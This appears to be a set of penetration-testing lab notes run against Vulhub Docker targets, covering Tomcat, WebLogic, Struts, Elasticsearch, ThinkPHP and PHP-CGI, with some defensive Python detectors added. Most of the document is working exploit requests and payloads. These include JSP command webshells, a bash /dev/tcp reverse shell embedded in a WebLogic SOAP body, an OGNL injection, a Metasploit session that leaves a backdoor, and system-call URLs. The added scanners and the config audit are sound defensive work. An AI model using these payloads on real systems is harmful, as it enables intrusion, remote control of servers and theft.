Contents
Appetizer: bash reverse shell on Linux
1 On the attacking machine: nc -lvp 4444
2 On the server: bash -i >& /dev/tcp/192.168.46.129/4444 0>&1
The key with these RCE vulnerabilities is to remember their payloads.
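From the defender's side, the bash /dev/tcp reverse shell above leaves a recognisable trace in process-execution telemetry. The following Python scanner is an added example, not part of the original notes: it parses auditd EXECVE records, decodes the hex-encoded argv entries auditd produces for arguments containing spaces, and flags command lines that combine a /dev/tcp or /dev/udp path with an interactive shell or an fd redirection, while ignoring plain port checks. The audit records are constructed for the example.

```python
import re

ARG_RE = re.compile(r'\ba(\d+)=("(?:[^"\\]|\\.)*"|[0-9A-Fa-f]+)')
EVENT_ID_RE = re.compile(r'msg=audit\([\d.]+:(\d+)\)')
DEV_TCP_RE = re.compile(r'/dev/(?:tcp|udp)/[\w.\-]+/\d+')
INTERACTIVE_SHELL_RE = re.compile(r'(?:^|[\s;|&/])(?:bash|sh|zsh|dash)\s+-i\b')


def _hex(s):
    """auditd hex-encodes any argv element containing a space, a quote or a control character."""
    return s.encode().hex().upper()


# Constructed sample records in auditd's EXECVE format (not real captures).
SAMPLE_AUDIT_LINES = [
    'type=EXECVE msg=audit(1605946315.101:201): argc=3 a0="bash" a1="-c" a2='
    + _hex('bash -i >& /dev/tcp/192.168.46.129/4444 0>&1'),
    'type=EXECVE msg=audit(1605946316.102:202): argc=2 a0="ls" a1="-la"',
    'type=SYSCALL msg=audit(1605946316.102:202): arch=c000003e syscall=59 success=yes exit=0',
    'type=EXECVE msg=audit(1605946317.103:203): argc=3 a0="/bin/sh" a1="-c" a2='
    + _hex('echo probe > /dev/tcp/10.0.0.5/80'),  # a port check, not a shell
    'type=EXECVE msg=audit(1605946318.104:204): argc=3 a0="sh" a1="-c" a2='
    + _hex('nohup bash -i >& /dev/tcp/10.0.0.5/4444 0>&1 &'),
]


def decode_arg(raw):
    """Quoted values are used verbatim; unquoted values are auditd hex strings."""
    if raw.startswith('"'):
        return raw[1:-1]
    return bytes.fromhex(raw).decode('utf-8', errors='replace')


def parse_execve(line):
    """Return (event_id, argv) for an EXECVE record, or None for any other record type."""
    if 'type=EXECVE' not in line:
        return None
    m = EVENT_ID_RE.search(line)
    event_id = m.group(1) if m else None
    args = sorted((int(i), decode_arg(v)) for i, v in ARG_RE.findall(line))
    return event_id, [v for _, v in args]


def looks_like_reverse_shell(argv):
    """Flag /dev/tcp or /dev/udp use only when paired with an interactive shell (-i) or an
    fd redirection (>& / <&); a bare 'echo > /dev/tcp/host/port' port check is ignored."""
    cmdline = ' '.join(argv)
    if not DEV_TCP_RE.search(cmdline):
        return False
    return bool(INTERACTIVE_SHELL_RE.search(cmdline)) or '>&' in cmdline or '<&' in cmdline


def scan_audit_log(lines):
    """Return [(event_id, command_line)] for every EXECVE record that looks like a reverse shell."""
    hits = []
    for line in lines:
        parsed = parse_execve(line)
        if parsed and looks_like_reverse_shell(parsed[1]):
            hits.append((parsed[0], ' '.join(parsed[1])))
    return hits


if __name__ == '__main__':
    for event_id, cmd in scan_audit_log(SAMPLE_AUDIT_LINES):
        print(f'event {event_id}: {cmd}')
```

The same logic works on any source that yields argv lists (an EDR's process-creation events, for instance); the auditd parsing is just the part that most often goes wrong in home-grown rules because of the hex encoding.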
I Tomcat PUT upload leading to code execution
1 Vulnerability ID
CVE-2017-12615
2 Path
cd /home/vulhub/vulhub-master/tomcat/CVE-2017-12615
sudo docker-compose build
sudo docker-compose up -d
3 Visit the IP
4 Capture the request in Burp
PUT /1.jsp/ HTTP/1.1
Host: 192.168.46.129:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
shell
The body ("shell") can be any content, including a one-line webshell.
A 201 response is the correct result: 1.jsp has been written.
HTTP/1.1 201
Content-Length: 0
Date: Sat, 21 Nov 2020 08:11:55 GMT
Connection: close
5 Then visit
http://192.168.46.129:8080/1.jsp?cmd=id
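An added example, not part of the original notes: a small Python model of why a PUT to /1.jsp/ ends up as 1.jsp on disk, together with an audit of the Tomcat conf/web.xml setting that makes the write possible. The web.xml excerpt is constructed, and the dispatch model is deliberately simplified: extension mappings such as *.jsp are matched against the raw request path, so the trailing slash keeps the request away from the JSP servlet and hands it to the DefaultServlet, which drops the slash when it resolves the file name. The hardening check is the one a practitioner actually wants: DefaultServlet must not carry readonly=false.

```python
import posixpath
import xml.etree.ElementTree as ET

NS = {'j': 'http://xmlns.jcp.org/xml/ns/javaee'}

# Constructed excerpt of a Tomcat conf/web.xml carrying the weak setting; a real file has far more in it.
WEAK_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
      <param-name>readonly</param-name>
      <param-value>false</param-value>
    </init-param>
  </servlet>
  <servlet-mapping>
    <servlet-name>jsp</servlet-name>
    <url-pattern>*.jsp</url-pattern>
    <url-pattern>*.jspx</url-pattern>
  </servlet-mapping>
</web-app>
"""

HARDENED_WEB_XML = WEAK_WEB_XML.replace('<param-value>false</param-value>', '<param-value>true</param-value>')


def default_servlet_readonly(web_xml_text):
    """True if DefaultServlet refuses PUT/DELETE. Tomcat's default when the
    readonly init-param is absent is true; the lab image sets it to false."""
    root = ET.fromstring(web_xml_text)
    for servlet in root.findall('j:servlet', NS):
        cls = (servlet.findtext('j:servlet-class', default='', namespaces=NS) or '').strip()
        if cls != 'org.apache.catalina.servlets.DefaultServlet':
            continue
        for param in servlet.findall('j:init-param', NS):
            name = (param.findtext('j:param-name', default='', namespaces=NS) or '').strip()
            if name == 'readonly':
                value = (param.findtext('j:param-value', default='true', namespaces=NS) or '').strip()
                return value.lower() != 'false'
    return True


def jsp_servlet_patterns(web_xml_text):
    """URL patterns mapped to the JSP servlet (normally *.jsp and *.jspx)."""
    root = ET.fromstring(web_xml_text)
    patterns = []
    for mapping in root.findall('j:servlet-mapping', NS):
        if (mapping.findtext('j:servlet-name', default='', namespaces=NS) or '').strip() == 'jsp':
            patterns += [(p.text or '').strip() for p in mapping.findall('j:url-pattern', NS)]
    return patterns


def route_put(request_path, web_xml_text):
    """Simplified model of how Tomcat dispatches a PUT.
    Returns (servlet, stored_filename); stored_filename is None when nothing is written."""
    patterns = jsp_servlet_patterns(web_xml_text)
    # Extension mappings are compared against the raw request path: '/1.jsp' matches
    # '*.jsp', but '/1.jsp/' does not, so the request falls through to DefaultServlet.
    if any(request_path.endswith(p[1:]) for p in patterns if p.startswith('*.')):
        return ('jsp', None)       # JspServlet has no doPut -> 405, nothing written
    if default_servlet_readonly(web_xml_text):
        return ('default', None)   # readonly=true -> 403
    # DefaultServlet resolves the resource name without the trailing slash, so the
    # body lands in a file whose name does end in .jsp and is compiled as a JSP later.
    return ('default', posixpath.basename(request_path.rstrip('/')))


def audit(web_xml_text):
    """One-line verdict a configuration check would report."""
    if default_servlet_readonly(web_xml_text):
        return 'OK: DefaultServlet readonly'
    return 'FINDING: DefaultServlet readonly=false (HTTP PUT enabled)'


if __name__ == '__main__':
    print(audit(WEAK_WEB_XML))
    print(route_put('/1.jsp', WEAK_WEB_XML), route_put('/1.jsp/', WEAK_WEB_XML))
```

Point the audit at the real conf/web.xml (and any per-application WEB-INF/web.xml that redeclares the default servlet); the fix is simply readonly=true or removing the init-param, since that is already Tomcat's default.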
II Further exploitation
1 Write a program that pops a calculator
PUT /3.jsp/ HTTP/1.1
Host: 192.168.46.129:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
This did not work very well.
2 A bash reverse shell is another approach: make the payload a reverse shell
bash -i >& /dev/tcp/192.168.46.130/4444 0>&1
3 One-line webshell, connect with China Chopper (菜刀)
The JSP is parsed successfully
That was a PHP webshell; a dedicated JSP webshell is needed
<%
out.print("Hello World!");
%>
Visit
http://192.168.46.129:8080/10.jsp
II WebLogic deserialization
Vulnerability principle
WebLogic's WLS Security component exposes a web service that uses XMLDecoder to parse user-supplied XML data; a deserialization vulnerability occurs during that parsing, allowing arbitrary command execution.
Approach 1: bash reverse shell
2 Write a JSP webshell
1 Version/ID
CVE-2017-10271
2 Vulnerability path
/weblogic/CVE-2017-10271
3 Visiting it gives a 403 error
http://192.168.46.129:7001
Send the following request
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.46.129:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
/bin/bash
-c
bash -i >& /dev/tcp/192.168.46.130/4444 0>&1
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
Meanwhile, start an nc listener on Kali and you get a shell
nc -lvnp 4444
-l listen, -v verbose output, -n numeric addresses only (no DNS lookup), -p port
View the current directory
II Further exploitation of WebLogic
Write a webshell
Request
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.46.129:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp
<![CDATA[ <% out.print("hello world"); %> ]]>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
Visit it in the browser; success
192.168.46.129:7001/bea_wls_internal/test.jsp
III RCE code-execution vulnerabilities
1 Struts S2-057
Remote code execution, CVE-2018-11776
2 Visit http://192.168.46.129:8080/showcase/
3 The 233*233 in this spot got evaluated by the code, so it is a candidate injection point
http://192.168.46.129:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action
4 Capture the request in Burp and modify part of it, URL-encoding the result: capture the 233*233 request, send it to Repeater, and use the decoder to URL-decode it
5 Payload: exec didn't work, use system
${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
2 Elasticsearch remote code execution vulnerability
CVE-2014-3120
I Principle
1 Distributed search and analytics engine
II Steps
1 Open the target directory
cd /home/vulhub/vulhub-master/elasticsearch/CVE-2014-3120
sudo docker-compose build
sudo docker-compose up -d
2 Visit port 9200, capture a request with Burp, then send a request
First write one document; 201 means success
payload
POST /website/blog/ HTTP/1.1
Host: 192.168.46.129:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
{
"name": "phithon"
}
3 Then send a request carrying command execution; it succeeds and returns the id
POST /_search?pretty HTTP/1.1
Host: 192.168.46.129:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"pwd\").getInputStream()).useDelimiter(\"\\\\A\").next();"
}
}
}
Result
Shows the current directory
II Extension
Use the Elasticsearch module in msf to get a Meterpreter session
1 First search for a suitable module
search ElasticSearch
2 The port must be 9200
No payload needs to be set
use exploit/multi/elasticsearch/script_mvel_rce
show options
set rhosts 192.168.46.129
set rport 9200
3 run; success
It writes into the tmp directory (comparable to a system-wide temp location on Windows): even the lowest-privileged account has write permission there
A temporary backdoor is written there for now
4 Some post-exploitation
ifconfig
getuid
3 ThinkPHP framework vulnerabilities
(1) 2.x vulnerability; I don't understand the deeper cause
Enter the payload
http://192.168.46.129:8080/index.php?s=/index/index/name/${@phpinfo()}
Actual (URL-encoded) form
http://192.168.46.129:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D
(2) 5.0.20 vulnerability
The exact cause is complicated
payload
\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
http://192.168.46.129:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
http://192.168.46.129:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ipconfig
(3) PHP CGI remote code execution vulnerability
CVE-2012-1823
http://192.168.46.129:8080/index.php?-s dumps the source code
payload
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: example.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Result
<?php eval(phpinfo()); ?>
Shows phpinfo
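Every request pattern in these notes (the Tomcat PUT with a trailing slash, the WebLogic WorkContext posted to /wls-wsat/, the OGNL expression in the Struts URL path, the Elasticsearch script_fields query, the ThinkPHP s= routing tricks, and the PHP-CGI query string beginning with a switch) is visible in the raw request, which is what a WAF rule or a log-replay detector works from. The following Python is an added example, not from the original notes: it parses raw HTTP/1.x requests as Burp shows them and labels each with the patterns it matches. The sample requests are constructed to mirror the shapes captured above with harmless bodies and the lab addresses; the rule names are made up for this example.

```python
import json
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed requests mirroring the shapes captured in these notes (harmless bodies, lab addresses).
SAMPLE_REQUESTS = [
    "PUT /1.jsp/ HTTP/1.1\r\nHost: 192.168.46.129:8080\r\nContent-Length: 5\r\n\r\nshell",
    "POST /wls-wsat/CoordinatorPortType HTTP/1.1\r\nHost: 192.168.46.129:7001\r\nContent-Type: text/xml\r\n\r\n"
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header>'
    '<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">x</work:WorkContext>'
    '</soapenv:Header><soapenv:Body/></soapenv:Envelope>',
    "GET /struts2-showcase/$%7B233*233%7D/actionChain1.action HTTP/1.1\r\nHost: 192.168.46.129:8080\r\n\r\n",
    "POST /_search?pretty HTTP/1.1\r\nHost: 192.168.46.129:9200\r\n\r\n"
    '{"size": 1, "query": {"match_all": {}}, "script_fields": {"command": {"script": "1+1"}}}',
    "GET /index.php?s=/index/index/name/$%7B@phpinfo()%7D HTTP/1.1\r\nHost: 192.168.46.129:8080\r\n\r\n",
    "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 HTTP/1.1\r\n"
    "Host: 192.168.46.129:8080\r\n\r\n",
    "POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1\r\nHost: example.com\r\n\r\n<?php phpinfo(); ?>",
    "GET /index.php?s=/Index/Home/index HTTP/1.1\r\nHost: 192.168.46.129:8080\r\n\r\n",
    "POST /website/blog/ HTTP/1.1\r\nHost: 192.168.46.129:9200\r\n\r\n{\"name\": \"phithon\"}",
]


def parse_raw_request(raw):
    """Split a raw HTTP/1.x request (as captured in Burp) into method, target, headers and body."""
    head, _, body = raw.replace('\r\n', '\n').partition('\n\n')
    lines = head.split('\n')
    method, target, _version = lines[0].split(' ', 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(':')
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {'method': method, 'target': target, 'headers': headers, 'body': body}


def _has_dynamic_script(body):
    """True if a JSON search body carries a script inside script_fields."""
    try:
        doc = json.loads(body)
    except ValueError:
        return False
    fields = doc.get('script_fields') if isinstance(doc, dict) else None
    return isinstance(fields, dict) and any(isinstance(f, dict) and 'script' in f for f in fields.values())


def detect(req):
    """Return the names of the request patterns from these notes that the request matches."""
    findings = []
    parts = urlsplit(req['target'])
    path = unquote(parts.path)
    query = unquote(parts.query)
    body = req['body']
    s_param = parse_qs(parts.query).get('s', [''])[0]

    # Tomcat CVE-2017-12615: PUT of a JSP via DefaultServlet; the trailing '/' hides the extension
    if req['method'] in ('PUT', 'DELETE') and path.rstrip('/').lower().endswith(('.jsp', '.jspx')):
        findings.append('tomcat-put-jsp')
    # WebLogic CVE-2017-10271: WorkContext element posted to the wls-wsat endpoint
    if path.startswith('/wls-wsat/') and 'WorkContext' in body:
        findings.append('weblogic-wls-wsat-workcontext')
    # Struts S2-057 (CVE-2018-11776): OGNL expression delimiters in the URL path
    if '${' in path or '%{' in path:
        findings.append('struts-ognl-in-path')
    # Elasticsearch CVE-2014-3120: dynamic script inside script_fields of a _search body
    if '/_search' in path and _has_dynamic_script(body):
        findings.append('elasticsearch-dynamic-script')
    # ThinkPHP: namespace escape or an expression inside the s= routing parameter
    if '\\think\\' in s_param.lower() or 'invokefunction' in s_param.lower() or '${' in s_param:
        findings.append('thinkphp-route-injection')
    # PHP-CGI CVE-2012-1823: query string that php-cgi would parse as command-line switches
    if query.startswith('-'):
        findings.append('php-cgi-argv-injection')
    return findings


def scan_requests(raw_requests):
    return [detect(parse_raw_request(r)) for r in raw_requests]


if __name__ == '__main__':
    for raw, hits in zip(SAMPLE_REQUESTS, scan_requests(SAMPLE_REQUESTS)):
        print(raw.split('\r\n', 1)[0], '->', hits or 'clean')
```

The checks run on the decoded path and query on purpose: the Struts and ThinkPHP samples only reveal the `${` after URL-decoding, which is also why a naive rule on the raw request line misses them. Treat these as triage signals rather than proof; the only real fix for each is the vendor patch or, for Tomcat and Elasticsearch, the configuration change (readonly=true, no dynamic scripting).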